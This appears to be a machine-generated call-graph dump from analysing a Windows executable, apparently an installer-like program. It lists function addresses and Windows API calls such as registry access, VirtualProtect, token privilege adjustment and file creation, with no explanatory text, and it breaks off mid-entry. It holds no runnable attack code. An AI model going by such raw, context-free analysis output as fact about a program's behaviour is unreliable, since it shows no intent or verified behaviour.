6275 409466 6273->6275 6276 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6273->6276 6274->6275 6275->6266 6276->6274 6276->6275 6731 40995e 6733 409960 6731->6733 6732 409982 6733->6732 6734 40999e CallWindowProcA 6733->6734 6734->6732 6735 409960 6736 409982 6735->6736 6738 40996f 6735->6738 6737 40999e CallWindowProcA 6737->6736 6738->6736 6738->6737 6739 405160 6740 405173 6739->6740 6741 404e58 33 API calls 6740->6741 6742 405187 6741->6742 6277 402e64 6278 402e69 6277->6278 6279 402e7a RtlUnwind 6278->6279 6280 402e5e 6278->6280 6281 402e9d 6279->6281 5899 40766c SetFilePointer 5900 4076a3 5899->5900 5901 407693 GetLastError 5899->5901 5901->5900 5902 40769c 5901->5902 5903 40748c 35 API calls 5902->5903 5903->5900 6294 40667c IsDBCSLeadByte 6295 406694 6294->6295 6755 403f7d 6756 403fa2 6755->6756 6759 403f84 6755->6759 6758 403e8e 4 API calls 6756->6758 6756->6759 6757 403f8c 6758->6759 6759->6757 6760 402674 4 API calls 6759->6760 6761 403fca 6760->6761 6762 403d02 6768 403d12 6762->6768 6763 403ddf ExitProcess 6764 403db8 6765 403cc8 4 API calls 6764->6765 6767 403dc2 6765->6767 6766 403dea 6769 403cc8 4 API calls 6767->6769 6768->6763 6768->6764 6768->6766 6768->6768 6772 403da4 6768->6772 6773 403d8f MessageBoxA 6768->6773 6770 403dcc 6769->6770 6782 4019dc 6770->6782 6778 403fe4 6772->6778 6773->6764 6774 403dd1 6774->6763 6774->6766 6779 403fe8 6778->6779 6780 403f07 4 API calls 6779->6780 6781 404006 6780->6781 6783 401abb 6782->6783 6784 4019ed 6782->6784 6783->6774 6785 401a04 RtlEnterCriticalSection 6784->6785 6786 401a0e LocalFree 6784->6786 6785->6786 6787 401a41 6786->6787 6788 401a2f VirtualFree 6787->6788 6789 401a49 6787->6789 6788->6787 6790 401a70 LocalFree 6789->6790 6791 401a87 6789->6791 6790->6790 6790->6791 6792 401aa9 RtlDeleteCriticalSection 6791->6792 6793 401a9f RtlLeaveCriticalSection 6791->6793 6792->6774 6793->6792 6300 404206 6301 4041cc 6300->6301 6304 40420a 6300->6304 6302 404282 6303 403154 4 API calls 6305 404323 6303->6305 6304->6302 6304->6303 6306 402c08 6307 402c82 6306->6307 6310 402c19 6306->6310 6308 402c56 RtlUnwind 6309 403154 4 API calls 6308->6309 6309->6307 6310->6307 6310->6308 6313 402b28 6310->6313 6314 402b31 RaiseException 6313->6314 6315 402b47 6313->6315 6314->6315 6315->6308 6316 408c10 6317 408c17 6316->6317 6318 403198 4 API calls 6317->6318 6326 408cb1 6318->6326 6319 408cdc 6320 4031b8 4 API calls 6319->6320 6321 408d69 6320->6321 6322 408cc8 6324 4032fc 18 API calls 6322->6324 6323 403278 18 API calls 6323->6326 6324->6319 6325 4032fc 18 API calls 6325->6326 6326->6319 6326->6322 6326->6323 6326->6325 6331 40a814 6332 40a839 6331->6332 6333 40993c 29 API calls 6332->6333 6336 40a83e 6333->6336 6334 40a891 6365 4026c4 GetSystemTime 6334->6365 6336->6334 6339 408dd8 18 API calls 6336->6339 6337 40a896 6338 409330 46 API calls 6337->6338 6340 40a89e 6338->6340 6341 40a86d 6339->6341 6342 4031e8 18 API calls 6340->6342 6345 40a875 MessageBoxA 6341->6345 6343 40a8ab 6342->6343 6344 406928 19 API calls 6343->6344 6346 40a8b8 6344->6346 6345->6334 6347 40a882 6345->6347 6348 4066c0 19 API calls 6346->6348 6349 405864 19 API calls 6347->6349 6350 40a8c8 6348->6350 6349->6334 6351 406638 19 API calls 6350->6351 6352 40a8d9 6351->6352 6353 403340 18 API calls 6352->6353 6354 40a8e7 6353->6354 6355 4031e8 18 API calls 6354->6355 6356 40a8f7 6355->6356 6357 4074e0 37 API calls 6356->6357 6358 40a936 6357->6358 6359 402594 18 API calls 6358->6359 6360 40a956 6359->6360 6361 407a28 19 API calls 6360->6361 6362 40a998 6361->6362 6363 407cb8 35 API calls 6362->6363 6364 40a9bf 6363->6364 6365->6337 5443 407017 5444 407008 SetErrorMode 5443->5444 6366 403018 6367 403070 6366->6367 6368 403025 6366->6368 6369 40302a RtlUnwind 6368->6369 6370 40304e 6369->6370 6372 402f78 6370->6372 6373 402be8 6370->6373 6374 402bf1 RaiseException 6373->6374 6375 402c04 6373->6375 6374->6375 6375->6367 6380 40901e 6381 409010 6380->6381 6382 408fac Wow64RevertWow64FsRedirection 6381->6382 6383 409018 6382->6383 6384 409020 SetLastError 6385 409029 6384->6385 6400 403a28 ReadFile 6401 403a46 6400->6401 6402 403a49 GetLastError 6400->6402 5904 40762c ReadFile 5905 407663 5904->5905 5906 40764c 5904->5906 5907 407652 GetLastError 5906->5907 5908 40765c 5906->5908 5907->5905 5907->5908 5909 40748c 35 API calls 5908->5909 5909->5905 6804 40712e 6805 407118 6804->6805 6806 403198 4 API calls 6805->6806 6807 407120 6806->6807 6808 403198 4 API calls 6807->6808 6809 407128 6808->6809 5924 40a82f 5925 409ae8 18 API calls 5924->5925 5926 40a834 5925->5926 5927 40a839 5926->5927 5928 402f24 5 API calls 5926->5928 5961 40993c 5927->5961 5928->5927 5930 40a891 5966 4026c4 GetSystemTime 5930->5966 5932 40a83e 5932->5930 6027 408dd8 5932->6027 5933 40a896 5967 409330 5933->5967 5937 40a86d 5941 40a875 MessageBoxA 5937->5941 5938 4031e8 18 API calls 5939 40a8ab 5938->5939 5985 406928 5939->5985 5941->5930 5943 40a882 5941->5943 6030 405864 5943->6030 5948 40a8d9 6012 403340 5948->6012 5950 40a8e7 5951 4031e8 18 API calls 5950->5951 5952 40a8f7 5951->5952 5953 4074e0 37 API calls 5952->5953 5954 40a936 5953->5954 5955 402594 18 API calls 5954->5955 5956 40a956 5955->5956 5957 407a28 19 API calls 5956->5957 5958 40a998 5957->5958 5959 407cb8 35 API calls 5958->5959 5960 40a9bf 5959->5960 6034 40953c 5961->6034 5964 4098cc 19 API calls 5965 40995c 5964->5965 5965->5932 5966->5933 5976 409350 5967->5976 5970 409375 CreateDirectoryA 5971 4093ed 5970->5971 5972 40937f GetLastError 5970->5972 5973 40322c 4 API calls 5971->5973 5972->5976 5974 4093f7 5973->5974 5977 4031b8 4 API calls 5974->5977 5975 408dd8 18 API calls 5975->5976 5976->5970 5976->5975 5978 404c94 33 API calls 5976->5978 5981 407284 19 API calls 5976->5981 5983 408da8 18 API calls 5976->5983 5984 405890 18 API calls 5976->5984 6090 406cf4 5976->6090 6113 409224 5976->6113 5979 409411 5977->5979 5978->5976 5980 4031b8 4 API calls 5979->5980 5982 40941e 5980->5982 5981->5976 5982->5938 5983->5976 5984->5976 6219 406820 5985->6219 5988 403454 18 API calls 5989 40694a 5988->5989 5990 4066c0 5989->5990 6224 4068e4 5990->6224 5993 4066f0 5995 403340 18 API calls 5993->5995 5994 4066fe 5996 403454 18 API calls 5994->5996 5998 4066fc 5995->5998 5997 406711 5996->5997 5999 403340 18 API calls 5997->5999 6000 403198 4 API calls 5998->6000 5999->5998 6001 406733 6000->6001 6002 406638 6001->6002 6003 406642 6002->6003 6004 406665 6002->6004 6230 406950 6003->6230 6006 40322c 4 API calls 6004->6006 6008 40666e 6006->6008 6007 406649 6007->6004 6009 406654 6007->6009 6008->5948 6010 403340 18 API calls 6009->6010 6011 406662 6010->6011 6011->5948 6013 403344 6012->6013 6016 4033a5 6012->6016 6014 4031e8 6013->6014 6015 40334c 6013->6015 6019 403254 18 API calls 6014->6019 6022 4031fc 6014->6022 6015->6016 6017 40335b 6015->6017 6020 4031e8 18 API calls 6015->6020 6021 403254 18 API calls 6017->6021 6018 403228 6018->5950 6019->6022 6020->6017 6024 403375 6021->6024 6022->6018 6023 4025ac 4 API calls 6022->6023 6023->6018 6025 4031e8 18 API calls 6024->6025 6026 4033a1 6025->6026 6026->5950 6028 408da8 18 API calls 6027->6028 6029 408df4 6028->6029 6029->5937 6031 405869 6030->6031 6032 405940 19 API calls 6031->6032 6033 40587b 6032->6033 6033->6033 6041 40955b 6034->6041 6035 409590 6037 40959d GetUserDefaultLangID 6035->6037 6042 409592 6035->6042 6036 409594 6046 407024 GetModuleHandleA GetProcAddress 6036->6046 6037->6042 6040 40956f 6040->5964 6041->6035 6041->6036 6041->6040 6042->6040 6043 4095cb GetACP 6042->6043 6044 4095ef 6042->6044 6043->6040 6043->6042 6044->6040 6045 409615 GetACP 6044->6045 6045->6040 6045->6044 6047 407067 6046->6047 6048 40705e 6046->6048 6049 407070 6047->6049 6050 4070a8 6047->6050 6057 403198 4 API calls 6048->6057 6067 406f68 6049->6067 6051 406f68 RegOpenKeyExA 6050->6051 6055 4070c1 6051->6055 6053 407089 6054 4070de 6053->6054 6070 406f5c 6053->6070 6059 40322c 4 API calls 6054->6059 6055->6054 6058 406f5c 20 API calls 6055->6058 6061 407120 6057->6061 6062 4070d5 RegCloseKey 6058->6062 6063 4070eb 6059->6063 6064 403198 4 API calls 6061->6064 6062->6054 6065 4032fc 18 API calls 6063->6065 6066 407128 6064->6066 6065->6048 6066->6042 6068 406f73 6067->6068 6069 406f79 RegOpenKeyExA 6067->6069 6068->6069 6069->6053 6073 406e10 6070->6073 6074 406e36 RegQueryValueExA 6073->6074 6075 406e59 6074->6075 6080 406e7b 6074->6080 6076 406e73 6075->6076 6075->6080 6081 403278 18 API calls 6075->6081 6082 403420 18 API calls 6075->6082 6078 403198 4 API calls 6076->6078 6077 403198 4 API calls 6079 406f47 RegCloseKey 6077->6079 6078->6080 6079->6054 6080->6077 6081->6075 6083 406eb0 RegQueryValueExA 6082->6083 6083->6074 6084 406ecc 6083->6084 6084->6080 6085 4034f0 18 API calls 6084->6085 6086 406f0e 6085->6086 6087 406f20 6086->6087 6089 403420 18 API calls 6086->6089 6088 4031e8 18 API calls 6087->6088 6088->6080 6089->6087 6132 406a58 6090->6132 6094 406a58 19 API calls 6096 406d36 6094->6096 6095 406d26 6095->6094 6097 406d72 6095->6097 6098 406d42 6096->6098 6100 406a34 21 API calls 6096->6100 6140 406888 6097->6140 6098->6097 6101 406d67 6098->6101 6104 406a58 19 API calls 6098->6104 6100->6098 6101->6097 6152 406cc8 GetWindowsDirectoryA 6101->6152 6106 406d5b 6104->6106 6105 406638 19 API calls 6107 406d87 6105->6107 6106->6101 6108 406a34 21 API calls 6106->6108 6109 40322c 4 API calls 6107->6109 6108->6101 6110 406d91 6109->6110 6111 4031b8 4 API calls 6110->6111 6112 406dab 6111->6112 6112->5976 6114 409244 6113->6114 6115 406638 19 API calls 6114->6115 6116 40925d 6115->6116 6117 40322c 4 API calls 6116->6117 6124 409268 6117->6124 6119 406978 20 API calls 6119->6124 6120 408dd8 18 API calls 6120->6124 6121 4033b4 18 API calls 6121->6124 6122 405890 18 API calls 6122->6124 6124->6119 6124->6120 6124->6121 6124->6122 6125 4092e4 6124->6125 6192 4091b0 6124->6192 6200 409034 6124->6200 6126 40322c 4 API calls 6125->6126 6127 4092ef 6126->6127 6128 4031b8 4 API calls 6127->6128 6129 409309 6128->6129 6130 403198 4 API calls 6129->6130 6131 409311 6130->6131 6131->5976 6133 4034f0 18 API calls 6132->6133 6135 406a6b 6133->6135 6134 406a82 GetEnvironmentVariableA 6134->6135 6136 406a8e 6134->6136 6135->6134 6139 406a95 6135->6139 6154 406dec 6135->6154 6138 403198 4 API calls 6136->6138 6138->6139 6139->6095 6149 406a34 6139->6149 6141 403414 6140->6141 6142 4068ab GetFullPathNameA 6141->6142 6143 4068b7 6142->6143 6144 4068ce 6142->6144 6143->6144 6145 4068bf 6143->6145 6146 40322c 4 API calls 6144->6146 6147 403278 18 API calls 6145->6147 6148 4068cc 6146->6148 6147->6148 6148->6105 6158 4069dc 6149->6158 6153 406ce9 6152->6153 6153->6097 6155 406dfa 6154->6155 6156 4034f0 18 API calls 6155->6156 6157 406e08 6156->6157 6157->6135 6165 406978 6158->6165 6160 4069fe 6161 406a06 GetFileAttributesA 6160->6161 6162 406a1b 6161->6162 6163 403198 4 API calls 6162->6163 6164 406a23 6163->6164 6164->6095 6175 406744 6165->6175 6167 4069b0 6170 4069c6 6167->6170 6171 4069bb 6167->6171 6169 406989 6169->6167 6182 406970 CharPrevA 6169->6182 6183 403454 6170->6183 6172 40322c 4 API calls 6171->6172 6174 4069c4 6172->6174 6174->6160 6179 406755 6175->6179 6176 4067b9 6177 406680 IsDBCSLeadByte 6176->6177 6178 4067b4 6176->6178 6177->6178 6178->6169 6179->6176 6181 406773 6179->6181 6181->6178 6190 406680 IsDBCSLeadByte 6181->6190 6182->6169 6184 403486 6183->6184 6185 403459 6183->6185 6186 403198 4 API calls 6184->6186 6185->6184 6188 40346d 6185->6188 6187 40347c 6186->6187 6187->6174 6189 403278 18 API calls 6188->6189 6189->6187 6191 406694 6190->6191 6191->6181 6193 403198 4 API calls 6192->6193 6195 4091d1 6193->6195 6197 4091fe 6195->6197 6209 4032a8 6195->6209 6212 403494 6195->6212 6198 403198 4 API calls 6197->6198 6199 409213 6198->6199 6199->6124 6201 408f70 2 API calls 6200->6201 6202 40904a 6201->6202 6203 40904e 6202->6203 6216 406a48 6202->6216 6203->6124 6206 409081 6207 408fac Wow64RevertWow64FsRedirection 6206->6207 6208 409089 6207->6208 6208->6124 6210 403278 18 API calls 6209->6210 6211 4032b5 6210->6211 6211->6195 6213 403498 6212->6213 6215 4034c3 6212->6215 6214 4034f0 18 API calls 6213->6214 6214->6215 6215->6195 6217 4069dc 21 API calls 6216->6217 6218 406a52 GetLastError 6217->6218 6218->6206 6220 406744 IsDBCSLeadByte 6219->6220 6222 406835 6220->6222 6221 40687f 6221->5988 6222->6221 6223 406680 IsDBCSLeadByte 6222->6223 6223->6222 6225 4068f3 6224->6225 6226 406820 IsDBCSLeadByte 6225->6226 6228 4068fe 6226->6228 6227 4066ea 6227->5993 6227->5994 6228->6227 6229 406680 IsDBCSLeadByte 6228->6229 6229->6228 6231 406957 6230->6231 6232 40695b 6230->6232 6231->6007 6235 406970 CharPrevA 6232->6235 6234 40696c 6234->6007 6235->6234 6810 408f30 6813 408dfc 6810->6813 6814 408e05 6813->6814 6815 403198 4 API calls 6814->6815 6816 408e13 6814->6816 6815->6814 6817 403932 6818 403924 6817->6818 6819 40374c VariantClear 6818->6819 6820 40392c 6819->6820 5380 4075c4 SetFilePointer 5381 4075f7 5380->5381 5382 4075e7 GetLastError 5380->5382 5382->5381 5383 4075f0 5382->5383 5385 40748c GetLastError 5383->5385 5388 4073ec 5385->5388 5389 407284 19 API calls 5388->5389 5390 407414 5389->5390 5391 407434 5390->5391 5392 405194 33 API calls 5390->5392 5393 405890 18 API calls 5391->5393 5392->5391 5394 407443 5393->5394 5395 403198 4 API calls 5394->5395 5396 407460 5395->5396 5396->5381 6411 4076c8 WriteFile 6412 4076e8 6411->6412 6413 4076ef 6411->6413 6414 40748c 35 API calls 6412->6414 6415 407700 6413->6415 6416 4073ec 34 API calls 6413->6416 6414->6413 6416->6415 6417 402ccc 6420 402cfe 6417->6420 6421 402cdd 6417->6421 6418 402d88 RtlUnwind 6419 403154 4 API calls 6418->6419 6419->6420 6421->6418 6421->6420 6422 402b28 RaiseException 6421->6422 6423 402d7f 6422->6423 6423->6418 6829 403fcd 6830 403f07 4 API calls 6829->6830 6831 403fd6 6830->6831 6832 403e9c 4 API calls 6831->6832 6833 403fe2 6832->6833 6430 4024d0 6431 4024e4 6430->6431 6432 4024e9 6430->6432 6435 401918 4 API calls 6431->6435 6433 402518 6432->6433 6434 40250e RtlEnterCriticalSection 6432->6434 6437 4024ed 6432->6437 6445 402300 6433->6445 6434->6433 6435->6432 6438 402525 6441 402581 6438->6441 6442 402577 RtlLeaveCriticalSection 6438->6442 6440 401fd4 14 API calls 6443 402531 6440->6443 6442->6441 6443->6438 6444 40215c 9 API calls 6443->6444 6444->6438 6446 402314 6445->6446 6448 4023b8 6446->6448 6450 402335 6446->6450 6447 402344 6447->6438 6447->6440 6448->6447 6449 401d80 9 API calls 6448->6449 6453 402455 6448->6453 6455 401e84 6448->6455 6449->6448 6450->6447 6452 401b74 9 API calls 6450->6452 6452->6447 6453->6447 6454 401d00 9 API calls 6453->6454 6454->6447 6460 401768 6455->6460 6457 401e99 6458 401ea6 6457->6458 6459 401dcc 9 API calls 6457->6459 6458->6448 6459->6458 6461 401787 6460->6461 6462 40183b 6461->6462 6463 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6461->6463 6465 40132c LocalAlloc 6461->6465 6466 401821 6461->6466 6468 4017d6 6461->6468 6464 4015c4 VirtualAlloc 6462->6464 6469 4017e7 6462->6469 6463->6461 6464->6469 6465->6461 6467 40150c VirtualFree 6466->6467 6467->6469 6470 40150c VirtualFree 6468->6470 6469->6457 6470->6469 6471 4028d2 6472 4028da 6471->6472 6473 403554 4 API calls 6472->6473 6474 4028ef 6472->6474 6473->6472 6475 4025ac 4 API calls 6474->6475 6476 4028f4 6475->6476 6834 4019d3 6835 4019ba 6834->6835 6836 4019c3 RtlLeaveCriticalSection 6835->6836 6837 4019cd 6835->6837 6836->6837 5397 407fd4 5398 407fe6 5397->5398 5400 407fed 5397->5400 5408 407f10 5398->5408 5402 408017 5400->5402 5404 408015 5400->5404 5407 408021 5400->5407 5401 40804e 5419 407d7c 5402->5419 5403 407d7c 33 API calls 5403->5401 5422 407e2c 5404->5422 5407->5401 5407->5403 5409 407f25 5408->5409 5410 407d7c 33 API calls 5409->5410 5411 407f34 5409->5411 5410->5411 5412 407f6e 5411->5412 5413 407d7c 33 API calls 5411->5413 5414 407f82 5412->5414 5415 407d7c 33 API calls 5412->5415 5413->5412 5418 407fae 5414->5418 5429 407eb8 5414->5429 5415->5414 5418->5400 5432 4058c4 5419->5432 5421 407d9e 5421->5407 5423 405194 33 API calls 5422->5423 5424 407e57 5423->5424 5440 407de4 5424->5440 5426 407e5f 5427 403198 4 API calls 5426->5427 5428 407e74 5427->5428 5428->5407 5430 407ec7 VirtualFree 5429->5430 5431 407ed9 VirtualAlloc 5429->5431 5430->5431 5431->5418 5434 4058d0 5432->5434 5433 405194 33 API calls 5435 4058fd 5433->5435 5434->5433 5436 4031e8 18 API calls 5435->5436 5437 405908 5436->5437 5438 403198 4 API calls 5437->5438 5439 40591d 5438->5439 5439->5421 5441 4058c4 33 API calls 5440->5441 5442 407e06 5441->5442 5442->5426 6477 405ad4 6478 405adc 6477->6478 6480 405ae4 6477->6480 6479 405aeb 6478->6479 6481 405ae2 6478->6481 6482 405940 19 API calls 6479->6482 6484 405a4c 6481->6484 6482->6480 6485 405a54 6484->6485 6486 405a6e 6485->6486 6489 403154 4 API calls 6485->6489 6487 405a73 6486->6487 6488 405a8a 6486->6488 6490 405940 19 API calls 6487->6490 6491 403154 4 API calls 6488->6491 6489->6485 6492 405a86 6490->6492 6493 405a8f 6491->6493 6495 403154 4 API calls 6492->6495 6494 4059b0 33 API calls 6493->6494 6494->6492 6496 405ab8 6495->6496 6497 403154 4 API calls 6496->6497 6498 405ac6 6497->6498 6498->6480 5910 40a9de 5911 40aa03 5910->5911 5912 407918 InterlockedExchange 5911->5912 5913 40aa2d 5912->5913 5914 409ae8 18 API calls 5913->5914 5915 40aa3d 5913->5915 5914->5915 5920 4076ac SetEndOfFile 5915->5920 5917 40aa59 5918 4025ac 4 API calls 5917->5918 5919 40aa90 5918->5919 5921 4076c3 5920->5921 5922 4076bc 5920->5922 5921->5917 5923 40748c 35 API calls 5922->5923 5923->5921 6841 402be9 RaiseException 6842 402c04 6841->6842 6509 402af2 6510 402afe 6509->6510 6513 402ed0 6510->6513 6514 403154 4 API calls 6513->6514 6516 402ee0 6514->6516 6515 402b03 6516->6515 6518 402b0c 6516->6518 6519 402b25 6518->6519 6520 402b15 RaiseException 6518->6520 6519->6515 6520->6519 5448 40a5f8 5491 4030dc 5448->5491 5450 40a60e 5494 4042e8 5450->5494 5452 40a613 5497 40457c GetModuleHandleA GetProcAddress 5452->5497 5456 40a61d 5505 4065c8 5456->5505 5458 40a622 5514 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5458->5514 5468 40a665 5536 406c2c 5468->5536 5469 4031e8 18 API calls 5470 40a683 5469->5470 5550 4074e0 5470->5550 5476 407918 InterlockedExchange 5479 40a6d2 5476->5479 5477 40a710 5570 4074a0 5477->5570 5479->5477 5607 409ae8 5479->5607 5480 40a751 5574 407a28 5480->5574 5481 40a736 5481->5480 5482 409ae8 18 API calls 5481->5482 5482->5480 5484 40a776 5584 408b08 5484->5584 5488 40a7bc 5489 408b08 35 API calls 5488->5489 5490 40a7f5 5488->5490 5489->5488 5617 403094 5491->5617 5493 4030e1 GetModuleHandleA GetCommandLineA 5493->5450 5495 403154 4 API calls 5494->5495 5496 404323 5494->5496 5495->5496 5496->5452 5498 404598 5497->5498 5499 40459f GetProcAddress 5497->5499 5498->5499 5500 4045b5 GetProcAddress 5499->5500 5501 4045ae 5499->5501 5502 4045c4 SetProcessDEPPolicy 5500->5502 5503 4045c8 5500->5503 5501->5500 5502->5503 5504 404624 6FDA1CD0 5503->5504 5504->5456 5618 405ca8 5505->5618 5515 4090f7 5514->5515 5702 406fa0 SetErrorMode 5515->5702 5518 407284 19 API calls 5519 409127 5518->5519 5520 403198 4 API calls 5519->5520 5521 40913c 5520->5521 5522 409b78 GetSystemInfo VirtualQuery 5521->5522 5523 409c2c 5522->5523 5526 409ba2 5522->5526 5528 409768 5523->5528 5524 409c0d VirtualQuery 5524->5523 5524->5526 5525 409bcc VirtualProtect 5525->5526 5526->5523 5526->5524 5526->5525 5527 409bfb VirtualProtect 5526->5527 5527->5524 5708 406bd0 GetCommandLineA 5528->5708 5530 409785 5531 409850 5530->5531 5532 406c2c 20 API calls 5530->5532 5535 403454 18 API calls 5530->5535 5533 4031b8 4 API calls 5531->5533 5532->5530 5534 40986a 5533->5534 5534->5468 5600 409c88 5534->5600 5535->5530 5537 406c53 GetModuleFileNameA 5536->5537 5538 406c77 GetCommandLineA 5536->5538 5539 403278 18 API calls 5537->5539 5546 406c7c 5538->5546 5540 406c75 5539->5540 5544 406ca4 5540->5544 5541 406c81 5542 403198 4 API calls 5541->5542 5545 406c89 5542->5545 5543 406af0 18 API calls 5543->5546 5547 403198 4 API calls 5544->5547 5548 40322c 4 API calls 5545->5548 5546->5541 5546->5543 5546->5545 5549 406cb9 5547->5549 5548->5544 5549->5469 5551 4074ea 5550->5551 5715 407576 5551->5715 5718 407578 5551->5718 5552 407516 5553 40752a 5552->5553 5554 40748c 35 API calls 5552->5554 5557 409c34 FindResourceA 5553->5557 5554->5553 5558 409c49 5557->5558 5559 409c4e SizeofResource 5557->5559 5560 409ae8 18 API calls 5558->5560 5561 409c60 LoadResource 5559->5561 5562 409c5b 5559->5562 5560->5559 5564 409c73 LockResource 5561->5564 5565 409c6e 5561->5565 5563 409ae8 18 API calls 5562->5563 5563->5561 5567 409c84 5564->5567 5568 409c7f 5564->5568 5566 409ae8 18 API calls 5565->5566 5566->5564 5567->5476 5567->5479 5569 409ae8 18 API calls 5568->5569 5569->5567 5571 4074b4 5570->5571 5572 4074c4 5571->5572 5573 4073ec 34 API calls 5571->5573 5572->5481 5573->5572 5575 407a35 5574->5575 5576 405890 18 API calls 5575->5576 5577 407a89 5575->5577 5576->5577 5578 407918 InterlockedExchange 5577->5578 5579 407a9b 5578->5579 5580 405890 18 API calls 5579->5580 5581 407ab1 5579->5581 5580->5581 5582 405890 18 API calls 5581->5582 5583 407af4 5581->5583 5582->5583 5583->5484 5596 408b39 5584->5596 5598 408b82 5584->5598 5585 408bcd 5721 407cb8 5585->5721 5586 407cb8 35 API calls 5586->5596 5588 408be4 5591 4031b8 4 API calls 5588->5591 5589 4034f0 18 API calls 5589->5596 5590 4034f0 18 API calls 5590->5598 5593 408bfe 5591->5593 5592 4031e8 18 API calls 5592->5596 5614 404c20 5593->5614 5594 403420 18 API calls 5594->5596 5595 4031e8 18 API calls 5595->5598 5596->5586 5596->5589 5596->5592 5596->5594 5596->5598 5597 403420 18 API calls 5597->5598 5598->5585 5598->5590 5598->5595 5598->5597 5599 407cb8 35 API calls 5598->5599 5599->5598 5601 40322c 4 API calls 5600->5601 5602 409cab 5601->5602 5603 409cba MessageBoxA 5602->5603 5604 409ccf 5603->5604 5605 403198 4 API calls 5604->5605 5606 409cd7 5605->5606 5606->5468 5608 409af1 5607->5608 5609 409b09 5607->5609 5610 405890 18 API calls 5608->5610 5611 405890 18 API calls 5609->5611 5612 409b03 5610->5612 5613 409b1a 5611->5613 5612->5477 5613->5477 5743 402594 5614->5743 5616 404c2b 5616->5488 5617->5493 5619 405940 19 API calls 5618->5619 5620 405cb9 5619->5620 5621 405280 GetSystemDefaultLCID 5620->5621 5624 4052b6 5621->5624 5622 4031e8 18 API calls 5622->5624 5623 404cdc 19 API calls 5623->5624 5624->5622 5624->5623 5625 40520c 19 API calls 5624->5625 5626 405318 5624->5626 5625->5624 5627 404cdc 19 API calls 5626->5627 5628 40520c 19 API calls 5626->5628 5629 4031e8 18 API calls 5626->5629 5630 40539b 5626->5630 5627->5626 5628->5626 5629->5626 5631 4031b8 4 API calls 5630->5631 5632 4053b5 5631->5632 5633 4053c4 GetSystemDefaultLCID 5632->5633 5690 40520c GetLocaleInfoA 5633->5690 5636 4031e8 18 API calls 5637 405404 5636->5637 5638 40520c 19 API calls 5637->5638 5639 405419 5638->5639 5640 40520c 19 API calls 5639->5640 5641 40543d 5640->5641 5696 405258 GetLocaleInfoA 5641->5696 5644 405258 GetLocaleInfoA 5645 40546d 5644->5645 5646 40520c 19 API calls 5645->5646 5647 405487 5646->5647 5648 405258 GetLocaleInfoA 5647->5648 5649 4054a4 5648->5649 5650 40520c 19 API calls 5649->5650 5651 4054be 5650->5651 5652 4031e8 18 API calls 5651->5652 5653 4054cb 5652->5653 5654 40520c 19 API calls 5653->5654 5655 4054e0 5654->5655 5656 4031e8 18 API calls 5655->5656 5657 4054ed 5656->5657 5658 405258 GetLocaleInfoA 5657->5658 5659 4054fb 5658->5659 5660 40520c 19 API calls 5659->5660 5661 405515 5660->5661 5662 4031e8 18 API calls 5661->5662 5663 405522 5662->5663 5664 40520c 19 API calls 5663->5664 5665 405537 5664->5665 5666 4031e8 18 API calls 5665->5666 5667 405544 5666->5667 5668 40520c 19 API calls 5667->5668 5669 405559 5668->5669 5670 405576 5669->5670 5671 405567 5669->5671 5673 40322c 4 API calls 5670->5673 5698 40322c 5671->5698 5674 405574 5673->5674 5675 40520c 19 API calls 5674->5675 5676 405598 5675->5676 5677 4055b5 5676->5677 5678 4055a6 5676->5678 5679 403198 4 API calls 5677->5679 5680 40322c 4 API calls 5678->5680 5681 4055b3 5679->5681 5680->5681 5682 4033b4 18 API calls 5681->5682 5683 4055d7 5682->5683 5684 4033b4 18 API calls 5683->5684 5685 4055f1 5684->5685 5686 4031b8 4 API calls 5685->5686 5687 40560b 5686->5687 5688 405cf4 GetVersionExA 5687->5688 5689 405d0b 5688->5689 5689->5458 5691 405233 5690->5691 5692 405245 5690->5692 5693 403278 18 API calls 5691->5693 5694 40322c 4 API calls 5692->5694 5695 405243 5693->5695 5694->5695 5695->5636 5697 405274 5696->5697 5697->5644 5700 403230 5698->5700 5699 403252 5699->5674 5700->5699 5701 4025ac 4 API calls 5700->5701 5701->5699 5706 403414 5702->5706 5705 406fee 5705->5518 5707 403418 LoadLibraryA 5706->5707 5707->5705 5709 406af0 18 API calls 5708->5709 5710 406bf3 5709->5710 5711 406c05 5710->5711 5712 406af0 18 API calls 5710->5712 5713 403198 4 API calls 5711->5713 5712->5710 5714 406c1a 5713->5714 5714->5530 5716 407578 5715->5716 5717 4075b7 CreateFileA 5716->5717 5717->5552 5719 403414 5718->5719 5720 4075b7 CreateFileA 5719->5720 5720->5552 5722 407cd3 5721->5722 5724 407cc8 5721->5724 5727 407c5c 5722->5727 5724->5588 5726 405890 18 API calls 5726->5724 5728 407c70 5727->5728 5729 407caf 5727->5729 5728->5729 5731 407bac 5728->5731 5729->5724 5729->5726 5732 407bb7 5731->5732 5736 407bc8 5731->5736 5734 405890 18 API calls 5732->5734 5733 4074a0 34 API calls 5735 407bdc 5733->5735 5734->5736 5737 4074a0 34 API calls 5735->5737 5736->5733 5738 407bfd 5737->5738 5739 407918 InterlockedExchange 5738->5739 5740 407c12 5739->5740 5741 407c28 5740->5741 5742 405890 18 API calls 5740->5742 5741->5728 5742->5741 5744 402598 5743->5744 5745 4025a2 5743->5745 5749 401fd4 5744->5749 5745->5616 5745->5745 5746 40259e 5746->5745 5747 403154 4 API calls 5746->5747 5747->5745 5750 401fe8 5749->5750 5751 401fed 5749->5751 5760 401918 RtlInitializeCriticalSection 5750->5760 5753 402012 RtlEnterCriticalSection 5751->5753 5754 40201c 5751->5754 5759 401ff1 5751->5759 5753->5754 5754->5759 5767 401ee0 5754->5767 5757 402147 5757->5746 5758 40213d RtlLeaveCriticalSection 5758->5757 5759->5746 5761 40193c RtlEnterCriticalSection 5760->5761 5762 401946 5760->5762 5761->5762 5763 401964 LocalAlloc 5762->5763 5764 40197e 5763->5764 5765 4019c3 RtlLeaveCriticalSection 5764->5765 5766 4019cd 5764->5766 5765->5766 5766->5751 5770 401ef0 5767->5770 5768 401f1c 5772 401f40 5768->5772 5778 401d00 5768->5778 5770->5768 5770->5772 5773 401e58 5770->5773 5772->5757 5772->5758 5782 4016d8 5773->5782 5776 401e75 5776->5770 5779 401d4e 5778->5779 5780 401d1e 5778->5780 5779->5780 5851 401c68 5779->5851 5780->5772 5785 4016f4 5782->5785 5784 4016fe 5807 4015c4 5784->5807 5785->5784 5787 40175b 5785->5787 5789 40174f 5785->5789 5799 401430 5785->5799 5811 40132c 5785->5811 5787->5776 5792 401dcc 5787->5792 5815 40150c 5789->5815 5790 